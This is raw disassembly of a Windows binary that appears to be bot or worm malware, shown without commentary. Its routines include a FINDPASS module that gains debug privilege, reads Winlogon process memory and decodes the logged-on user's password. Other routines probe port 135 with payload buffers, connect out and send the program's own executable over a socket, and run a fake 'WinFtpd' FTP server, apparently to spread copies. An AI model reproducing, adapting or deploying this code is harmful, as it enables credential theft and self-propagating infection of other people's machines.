test eax, eax
pop ecx
pop ecx
jnz short loc_40336D
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_415136
pop ecx
push eax
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jnz short loc_40334B
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_40334B: ; CODE XREF: sub_4031EB+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_403306
loc_403359: ; CODE XREF: sub_4031EB+10F�j
test edi, edi
jz short loc_403364
push edi
call dword_434F20 ; RtlDestroyQueryDebugBuffer
loc_403364: ; CODE XREF: sub_4031EB+170�j
mov edi, [esp+28h+var_4]
jmp loc_4032DA
; ---------------------------------------------------------------------------
loc_40336D: ; CODE XREF: sub_4031EB+13C�j
xor eax, eax
jmp loc_4032E8
sub_4031EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403374 proc near ; CODE XREF: sub_4037CA+F0�p
var_68 = byte ptr -68h
var_64 = dword ptr -64h
var_44 = byte ptr -44h
var_38 = dword ptr -38h
var_33 = byte ptr -33h
var_2F = byte ptr -2Fh
var_28 = byte ptr -28h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 68h
push esi
push [ebp+arg_0]
xor esi, esi
push esi
push 410h
mov [ebp+var_14], esi
call ds:dword_420078 ; OpenProcess
cmp eax, esi
mov [ebp+var_8], eax
jnz short loc_40339D
xor eax, eax
jmp loc_40350F
; ---------------------------------------------------------------------------
loc_40339D: ; CODE XREF: sub_403374+20�j
mov eax, [ebp+arg_4]
push ebx
mov [eax], esi
push edi
lea eax, [ebp+var_68]
push eax
call ds:dword_420074 ; GetSystemInfo
push [ebp+var_64]
mov [ebp+var_C], esi
mov esi, ds:dword_420060
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_42005C
push eax
call edi ; RtlAllocateHeap
mov ebx, ds:dword_420070
lea ecx, [ebp+var_C]
push ecx
push [ebp+var_64]
mov [ebp+var_4], eax
push eax
push 7FFDF000h
push [ebp+var_8]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_4033ED
xor esi, esi
jmp loc_403502
; ---------------------------------------------------------------------------
loc_4033ED: ; CODE XREF: sub_403374+70�j
push 1Ch
lea eax, [ebp+var_44]
push eax
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_8]
call ds:dword_42006C ; VirtualQueryEx
test eax, eax
jz loc_4034F1
test [ebp+var_33], 10h
jz loc_4034F1
test [ebp+var_2F], 1
jnz loc_4034F1
push [ebp+var_38]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_38]
mov eax, [ebp+var_4]
push edi
push dword ptr [eax+18h]
mov [ebp+var_10], edi
push [ebp+var_8]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_4034F1
loc_403448: ; CODE XREF: sub_403374+108�j
push edi
push offset dword_433F10
call sub_41F5AC
test eax, eax
pop ecx
pop ecx
jnz short loc_403470
lea eax, [edi+200h]
push eax
push offset dword_434718
call sub_41F5AC
test eax, eax
pop ecx
pop ecx
jz short loc_403480
loc_403470: ; CODE XREF: sub_403374+E3�j
mov eax, [ebp+var_38]
mov ecx, [ebp+var_10]
inc edi
inc edi
add eax, ecx
cmp edi, eax
jb short loc_403448
jmp short loc_4034F1
; ---------------------------------------------------------------------------
loc_403480: ; CODE XREF: sub_403374+FA�j
test edi, edi
jz short loc_4034F1
lea eax, [ebp+var_18]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_420068 ; FileTimeToLocalFileTime
test eax, eax
jz short loc_4034BD
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_18]
push eax
call ds:dword_420064 ; FileTimeToSystemTime
test eax, eax
jz short loc_4034BD
mov ecx, [ebp+arg_4]
xor eax, eax
mov al, [edi+42Ch]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_4034BD: ; CODE XREF: sub_403374+123�j
; sub_403374+135�j
movzx eax, byte ptr [edi+42Dh]
mov dword_434F30, eax
mov eax, [ebp+var_4]
mov eax, [eax+18h]
sub eax, [ebp+var_10]
mov [ebp+var_14], 1
lea eax, [eax+edi+434h]
add edi, 434h
mov dword_434F28, eax
mov dword_434F2C, edi
loc_4034F1: ; CODE XREF: sub_403374+90�j
; sub_403374+9A�j ...
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
mov esi, [ebp+var_14]
loc_403502: ; CODE XREF: sub_403374+74�j
push [ebp+var_8]
call ds:dword_42003C ; CloseHandle
pop edi
mov eax, esi
pop ebx
loc_40350F: ; CODE XREF: sub_403374+24�j
pop esi
leave
retn
sub_403374 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403512 proc near ; CODE XREF: sub_4037CA:loc_4038C1�p
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1B = byte ptr -1Bh
var_17 = byte ptr -17h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push [ebp+arg_0]
push 0
push 410h
call ds:dword_420078 ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jnz short loc_403531
leave
retn
; ---------------------------------------------------------------------------
loc_403531: ; CODE XREF: sub_403512+1B�j
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push ebx
push esi
push edi
lea eax, [ebp+var_50]
push eax
call ds:dword_420074 ; GetSystemInfo
mov eax, [ebp+var_44]
mov ebx, [ebp+var_48]
cmp ebx, eax
mov [ebp+var_10], eax
jnb loc_4035F1
mov edi, ds:dword_420060
loc_40355B: ; CODE XREF: sub_403512+D9�j
push 1Ch
lea eax, [ebp+var_2C]
push eax
push ebx
push [ebp+var_4]
call ds:dword_42006C ; VirtualQueryEx
test eax, eax
jz short loc_4035DF
test [ebp+var_1B], 10h
mov eax, [ebp+var_20]
mov [ebp+var_8], eax
jz short loc_4035E5
test [ebp+var_17], 1
jnz short loc_4035E5
push eax
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_42005C ; RtlAllocateHeap
and [ebp+var_C], 0
mov esi, eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_20]
push esi
push ebx
push [ebp+var_4]
call ds:dword_420070 ; ReadProcessMemory
test eax, eax
jz short loc_4035D1
push offset dword_433F10
push esi
call sub_41F5AC
test eax, eax
pop ecx
pop ecx
jnz short loc_4035D1
lea eax, [esi+400h]
push offset dword_434718
push eax
call sub_41F5AC
test eax, eax
pop ecx
pop ecx
jz short loc_403603
loc_4035D1: ; CODE XREF: sub_403512+95�j
; sub_403512+A6�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
jmp short loc_4035E5
; ---------------------------------------------------------------------------
loc_4035DF: ; CODE XREF: sub_403512+5B�j
mov eax, [ebp+var_4C]
mov [ebp+var_8], eax
loc_4035E5: ; CODE XREF: sub_403512+67�j
; sub_403512+6D�j ...
add ebx, [ebp+var_8]
cmp ebx, [ebp+var_10]
jb loc_40355B
loc_4035F1: ; CODE XREF: sub_403512+3D�j
xor esi, esi
loc_4035F3: ; CODE XREF: sub_403512+123�j
push [ebp+var_4]
call ds:dword_42003C ; CloseHandle
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_403603: ; CODE XREF: sub_403512+BD�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword_434F28, ebx
mov dword_434F2C, eax
cmp [eax], cl
jnz short loc_403625
cmp [eax+1], cl
jz short loc_40362D
loc_403625: ; CODE XREF: sub_403512+10C�j
; sub_403512+119�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_403625
loc_40362D: ; CODE XREF: sub_403512+111�j
mov eax, [ebp+arg_4]
xor esi, esi
mov [eax], ecx
inc esi
jmp short loc_4035F3
sub_403512 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403637 proc near ; CODE XREF: sub_4037CA+134�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_434F24
add eax, eax
push ebx
mov ebx, ds:dword_420060
mov [ebp+var_8], ax
add eax, 2
push esi
mov [ebp+var_6], ax
movzx eax, ax
push edi
push eax
push 8
call ebx ; GetProcessHeap
push eax
call ds:dword_42005C ; RtlAllocateHeap
mov ecx, dword_434F24
mov esi, dword_434F2C
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov [ebp+var_4], edi
xor eax, eax
rep movsw
mov al, byte ptr dword_434F30
push eax
call dword_434714 ; RtlRunDecodeUnicodeString
push [ebp+var_4]
mov esi, offset dword_434F38
push offset dword_433F10
push offset dword_434718
push [ebp+arg_0]
push offset aFindpassTheWin ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push esi
call sub_41483D
add esp, 1Ch
push [ebp+var_4]
push 0
call ebx ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_403637 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036C9 proc near ; CODE XREF: sub_4037CA:loc_403905�p
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_434F24
add eax, eax
push ebx
mov [ebp+var_C], ax
add eax, 2
push esi
mov [ebp+var_A], ax
movzx eax, ax
push edi
push eax
push 8
call ds:dword_420060 ; GetProcessHeap
push eax
call ds:dword_42005C ; RtlAllocateHeap
and [ebp+var_4], 0
mov [ebp+var_8], eax
mov ebx, offset dword_435138
loc_403703: ; CODE XREF: sub_4036C9+E2�j
mov ecx, dword_434F24
mov esi, dword_434F2C
mov edi, [ebp+var_8]
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
rep movsw
call dword_434714 ; RtlRunDecodeUnicodeString
mov eax, dword_434F24
mov esi, [ebp+var_8]
xor edx, edx
inc edx
xor edi, edi
test eax, eax
jbe short loc_40375C
loc_403733: ; CODE XREF: sub_4036C9+8D�j
test edx, edx
jz short loc_403781
mov cl, [esi]
test cl, cl
jz short loc_40374F
cmp byte ptr [esi+1], 0
jnz short loc_40374F
cmp cl, 20h
jnb short loc_40374A
xor edx, edx
loc_40374A: ; CODE XREF: sub_4036C9+7D�j
cmp cl, 7Eh
jbe short loc_403751
loc_40374F: ; CODE XREF: sub_4036C9+72�j
; sub_4036C9+78�j
xor edx, edx
loc_403751: ; CODE XREF: sub_4036C9+84�j
inc esi
inc esi
inc edi
cmp edi, eax
jb short loc_403733
test edx, edx
jz short loc_403781
loc_40375C: ; CODE XREF: sub_4036C9+68�j
push [ebp+var_8]
push offset dword_433F10
push offset dword_434718
push [ebp+arg_0]
push offset aFindpassTheWin ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push ebx
call sub_41483D
add esp, 1Ch
jmp short loc_4037A1
; ---------------------------------------------------------------------------
loc_403781: ; CODE XREF: sub_4036C9+6C�j
; sub_4036C9+91�j
push offset dword_433F10
push offset dword_434718
push [ebp+arg_0]
push offset aFindpassTheW_0 ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push ebx
call sub_41483D
add esp, 18h
loc_4037A1: ; CODE XREF: sub_4036C9+B6�j
inc [ebp+var_4]
cmp [ebp+var_4], 0FFh
jbe loc_403703
push [ebp+var_8]
push 0
call ds:dword_420060 ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_4036C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4037CA proc near ; DATA XREF: sub_408A18+413C�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 29Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_9C]
rep movsd
xor esi, esi
inc esi
mov [eax+90h], esi
call sub_41162E
cmp eax, esi
mov [ebp+74h+var_4], eax
jz short loc_403809
cmp eax, 2
jz short loc_403809
push offset aFindpassOnlySu ; "[FINDPASS]: Only supported on Windows N"...
jmp loc_403946
; ---------------------------------------------------------------------------
loc_403809: ; CODE XREF: sub_4037CA+2E�j
; sub_4037CA+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40819B
test eax, eax
pop ecx
pop ecx
jz loc_403941
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:dword_420088 ; LoadLibraryA
mov esi, ds:dword_420084
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+74h+var_8], edi
call esi ; GetProcAddress
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov dword_434710, eax
call esi ; GetProcAddress
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov dword_434F18, eax
call esi ; GetProcAddress
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov dword_434F1C, eax
call esi ; GetProcAddress
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov dword_434F20, eax
call esi ; GetProcAddress
mov dword_434714, eax
call sub_4031EB
test eax, eax
mov [ebp+74h+arg_0], eax
jz loc_403915
mov esi, ds:dword_420080
mov edi, 400h
push edi
mov ebx, offset dword_433F10
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset dword_434718
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+74h+var_4], 1
push offset dword_434F24
push [ebp+74h+arg_0]
jnz short loc_4038C1
call sub_403374
jmp short loc_4038C6
; ---------------------------------------------------------------------------
loc_4038C1: ; CODE XREF: sub_4037CA+EE�j
call sub_403512
loc_4038C6: ; CODE XREF: sub_4037CA+F5�j
test eax, eax
pop ecx
pop ecx
jz short loc_40390E
cmp dword_434F24, 0
jnz short loc_4038F5
push ebx
push edi
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_29C]
push offset aFindpassTheW_1 ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push eax
call sub_41483D
add esp, 18h
jmp short loc_403928
; ---------------------------------------------------------------------------
loc_4038F5: ; CODE XREF: sub_4037CA+109�j
cmp [ebp+74h+var_4], 1
push [ebp+74h+arg_0]
jnz short loc_403905
call sub_403637
jmp short loc_40390A
; ---------------------------------------------------------------------------
loc_403905: ; CODE XREF: sub_4037CA+132�j
call sub_4036C9
loc_40390A: ; CODE XREF: sub_4037CA+139�j
pop ecx
push eax
jmp short loc_40391A
; ---------------------------------------------------------------------------
loc_40390E: ; CODE XREF: sub_4037CA+100�j
push offset aFindpassUnable ; "[FINDPASS]: Unable to find the password"...
jmp short loc_40391A
; ---------------------------------------------------------------------------
loc_403915: ; CODE XREF: sub_4037CA+B5�j
push offset aFindpassUnab_0 ; "[FINDPASS]: Unable to find Winlogon Pro"...
loc_40391A: ; CODE XREF: sub_4037CA+142�j
; sub_4037CA+149�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_4145E5
pop ecx
pop ecx
loc_403928: ; CODE XREF: sub_4037CA+129�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40819B
pop ecx
pop ecx
push [ebp+74h+var_8]
call ds:dword_42007C ; FreeLibrary
jmp short loc_403954
; ---------------------------------------------------------------------------
loc_403941: ; CODE XREF: sub_4037CA+4E�j
push offset aFindpassFailed ; "[FINDPASS]: Failed to enable Debug Priv"...
loc_403946: ; CODE XREF: sub_4037CA+3A�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_4145E5
pop ecx
pop ecx
loc_403954: ; CODE XREF: sub_4037CA+175�j
xor esi, esi
cmp [ebp+74h+var_10], esi
jnz short loc_403975
push esi
push [ebp+74h+var_14]
lea eax, [ebp+74h+var_29C]
push eax
lea eax, [ebp+74h+var_98]
push eax
push [ebp+74h+var_9C]
call sub_4056FB
add esp, 14h
loc_403975: ; CODE XREF: sub_4037CA+18F�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_401EFF
push [ebp+74h+var_18]
call sub_412735
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_4037CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403993 proc near ; CODE XREF: sub_4039C6+11C�p
; sub_4039C6+145�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
sub edx, [ebp+arg_C]
push ebx
push esi
xor eax, eax
test edx, edx
push edi
jle short loc_4039BB
loc_4039A5: ; CODE XREF: sub_403993+26�j
mov esi, [ebp+arg_0]
mov ecx, [ebp+arg_C]
mov edi, [ebp+arg_8]
add esi, eax
xor ebx, ebx
repe cmpsb
jz short loc_4039C2
inc eax
cmp eax, edx
jl short loc_4039A5
loc_4039BB: ; CODE XREF: sub_403993+10�j
xor al, al
loc_4039BD: ; CODE XREF: sub_403993+31�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4039C2: ; CODE XREF: sub_403993+21�j
mov al, 1
jmp short loc_4039BD
sub_403993 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039C6 proc near ; CODE XREF: .text:004136F9�p
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_414800
mov eax, [ebp+arg_4]
dec eax
jz short loc_403A03
dec eax
jz short loc_4039E1
dec eax
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4039E1: ; CODE XREF: sub_4039C6+14�j
push 3
push 1388h
push [ebp+arg_0]
call dword_43585C ; inet_addr
push eax
call sub_4018CA
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
leave
retn
; ---------------------------------------------------------------------------
loc_403A03: ; CODE XREF: sub_4039C6+11�j
push ebx
push esi
push 6
push 1
push 2
call dword_4357E8 ; socket
mov esi, eax
or ebx, 0FFFFFFFFh
xor eax, eax
cmp esi, ebx
mov [ebp+arg_4], esi
jz loc_403B28
push edi
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 87h
mov [ebp+var_10], 2
call dword_435934 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_407C3B
pop ecx
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_4357A0 ; connect
cmp eax, ebx
jz short loc_403A72
xor edi, edi
push edi
push 48h
push offset dword_42B3E0
push esi
call dword_43587C ; send
cmp eax, ebx
jnz short loc_403A79
loc_403A72: ; CODE XREF: sub_4039C6+95�j
; sub_4039C6+CC�j ...
xor esi, esi
jmp loc_403B1C
; ---------------------------------------------------------------------------
loc_403A79: ; CODE XREF: sub_4039C6+AA�j
push edi
mov esi, 2000h
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_43575C ; recv
cmp eax, ebx
jz short loc_403A72
cmp [ebp+var_200E], 0Ch
jnz short loc_403A72
push edi
push 18h
push offset dword_42B42C
push [ebp+arg_4]
call dword_43587C ; send
cmp eax, ebx
jz short loc_403A72
push edi
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_43575C ; recv
mov esi, eax
cmp esi, ebx
jz short loc_403A72
cmp [ebp+var_200E], 2
jnz short loc_403A72
push 10h
push offset loc_42B448
lea eax, [ebp+var_2010]
push esi
push eax
call sub_403993
add esp, 10h
test al, al
jz short loc_403AFC
xor eax, eax
cmp esi, 12Ch
setnl al
inc eax
jmp short loc_403B1A
; ---------------------------------------------------------------------------
loc_403AFC: ; CODE XREF: sub_4039C6+126�j
push 10h
push offset dword_42B45C
lea eax, [ebp+var_2010]
push esi
push eax
call sub_403993
add esp, 10h
neg al
sbb eax, eax
and eax, 3
loc_403B1A: ; CODE XREF: sub_4039C6+134�j
mov esi, eax
loc_403B1C: ; CODE XREF: sub_4039C6+AE�j
push [ebp+arg_4]
call dword_4358F4 ; closesocket
mov eax, esi
pop edi
loc_403B28: ; CODE XREF: sub_4039C6+57�j
pop esi
pop ebx
leave
retn
sub_4039C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B2C proc near ; CODE XREF: sub_403C3B+4A2�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_420200
push 0
push 1
push 2
call ds:dword_420204
push [ebp+arg_0]
mov dword_435338, eax
mov [ebp+var_10], 2
call ds:dword_420208
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_42020C
mov [ebp+var_E], ax
push 10h
lea eax, [ebp+var_10]
push eax
push dword_435338
call ds:dword_420210
cmp eax, 0FFFFFFFFh
jnz short loc_403BA4
push dword_435338
call ds:dword_420214
call ds:dword_420218
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_403BA4: ; CODE XREF: sub_403B2C+60�j
xor eax, eax
inc eax
leave
retn
sub_403B2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BA9 proc near ; CODE XREF: sub_403C3B+4AE�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
push 104h
lea eax, [ebp+var_104]
push eax
push 0
call ds:dword_420010 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset dword_420978
push eax
call sub_414DC3
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_403C16
jmp short loc_403C38
; ---------------------------------------------------------------------------
loc_403BE2: ; CODE XREF: sub_403BA9+72�j
push 400h
lea eax, [ebp+var_504]
push 1
push eax
call sub_414B6E
add esp, 10h
push 0
push eax
lea eax, [ebp+var_504]
push eax
push dword_435338
call ds:dword_4201FC
push 0Ah
call ds:dword_420000 ; Sleep
loc_403C16: ; CODE XREF: sub_403BA9+35�j
test byte ptr [esi+0Ch], 10h
push esi
jz short loc_403BE2
call sub_4149C3
pop ecx
push dword_435338
call ds:dword_420214
call ds:dword_420218
xor eax, eax
inc eax
loc_403C38: ; CODE XREF: sub_403BA9+37�j
pop esi
leave
retn
sub_403BA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_403C3B proc near ; DATA XREF: sub_401141+254�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0A6Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
xor ebx, ebx
inc ebx
mov ecx, 0A9h
lea edi, [ebp+74h+var_6DC]
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+74h+var_A6C]
push eax
xor esi, esi
push 101h
mov [ebp+74h+var_18], ebx
mov [ebp+74h+var_1C], ebx
mov [ebp+74h+var_228], esi
mov [ebp+74h+var_438], esi
call ds:dword_420200
push esi
call sub_415420
push eax
call sub_414794
mov eax, [ebp+74h+arg_0]
mov eax, [eax+214h]
pop ecx
pop ecx
push esi
push ebx
push 2
mov dword_43533C, eax
call ds:dword_420204
mov ebx, eax
push 4
lea eax, [ebp+74h+var_18]
push eax
push 4
push 0FFFFh
push ebx
mov [ebp+74h+var_8], ebx
call ds:dword_4201DC
lea eax, [ebp+74h+var_1C]
push eax
push 8004667Eh
push ebx
call ds:dword_4201E0
xor eax, eax
mov ax, word ptr dword_43533C
mov [ebp+74h+var_38], 2
mov [ebp+74h+var_34], esi
push eax
call ds:dword_42020C
mov [ebp+74h+var_36], ax
push 10h
lea eax, [ebp+74h+var_38]
push eax
push ebx
call ds:dword_4201E4
test eax, eax
jl loc_4041D5
push 0Ah
push ebx
call ds:dword_4201E8
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
mov [ebp+74h+var_224], ebx
mov [ebp+74h+var_4], ebx
push eax
inc ebx
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
mov [ebp+74h+var_228], 1
push ebx
rep movsd
call ds:dword_4201EC
cmp eax, 0FFFFFFFFh
jz loc_4041D5
mov ebx, ds:dword_4201FC
loc_403D5A: ; CODE XREF: sub_403C3B+594�j
xor esi, esi
cmp [ebp+74h+var_4], esi
mov [ebp+74h+arg_0], esi
jl loc_4041A4
loc_403D68: ; CODE XREF: sub_403C3B+563�j
push 19h
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+74h+var_29C]
rep stosd
pop ecx
lea edi, [ebp+74h+var_AC]
rep stosd
lea eax, [ebp+74h+var_438]
push eax
push esi
call sub_41F5A0
test eax, eax
jz loc_404197
cmp esi, [ebp+74h+var_8]
jnz short loc_403E02
push 10h
pop edi
lea eax, [ebp+74h+var_24]
push eax
lea eax, [ebp+74h+var_238]
push eax
push [ebp+74h+var_8]
mov [ebp+74h+var_24], edi
call ds:dword_4201F4
cmp eax, 0FFFFFFFFh
jz loc_404197
mov edx, [ebp+74h+var_228]
xor ecx, ecx
test edx, edx
jbe short loc_403DD4
loc_403DC6: ; CODE XREF: sub_403C3B+197�j
cmp [ebp+ecx*4+74h+var_224], eax
jz short loc_403DD4
inc ecx
cmp ecx, edx
jb short loc_403DC6
loc_403DD4: ; CODE XREF: sub_403C3B+189�j
; sub_403C3B+192�j
cmp ecx, edx
jnz short loc_403DEA
cmp edx, 40h
jnb short loc_403DEA
mov [ebp+ecx*4+74h+var_224], eax
inc [ebp+74h+var_228]
loc_403DEA: ; CODE XREF: sub_403C3B+19B�j
; sub_403C3B+1A0�j
cmp eax, [ebp+74h+var_4]
jle short loc_403DF2
mov [ebp+74h+var_4], eax
loc_403DF2: ; CODE XREF: sub_403C3B+1B2�j
push 0
push edi
push offset a220Winftpd1_2 ; "220 WinFtpd 1.2\n"
push eax
call ebx
jmp loc_404197
; ---------------------------------------------------------------------------
loc_403E02: ; CODE XREF: sub_403C3B+15A�j
push 0
push 64h
lea eax, [ebp+74h+var_29C]
push eax
push esi
call ds:dword_4201F8
test eax, eax
jg short loc_403E60
mov ecx, [ebp+74h+var_228]
xor eax, eax
test ecx, ecx
jbe short loc_403E54
loc_403E24: ; CODE XREF: sub_403C3B+1F5�j
cmp [ebp+eax*4+74h+var_224], esi
jz short loc_403E49
inc eax
cmp eax, ecx
jb short loc_403E24
jmp short loc_403E54
; ---------------------------------------------------------------------------
loc_403E34: ; CODE XREF: sub_403C3B+211�j
mov ecx, [ebp+eax*4+74h+var_220]
mov [ebp+eax*4+74h+var_224], ecx
mov ecx, [ebp+74h+var_228]
inc eax
loc_403E49: ; CODE XREF: sub_403C3B+1F0�j
dec ecx
cmp eax, ecx
jb short loc_403E34
dec [ebp+74h+var_228]
loc_403E54: ; CODE XREF: sub_403C3B+1E7�j
; sub_403C3B+1F7�j
push esi
call ds:dword_420214
jmp loc_404197
; ---------------------------------------------------------------------------
loc_403E60: ; CODE XREF: sub_403C3B+1DB�j
lea eax, [ebp+74h+var_334]
push eax
lea eax, [ebp+74h+var_AC]
push eax
lea eax, [ebp+74h+var_29C]
push offset aSS_1 ; "%s %s"
push eax
call sub_4147C3
add esp, 10h
push 5
pop edx
mov edi, offset aUser_0 ; "USER"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_403E9F
push eax
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_404182
; ---------------------------------------------------------------------------
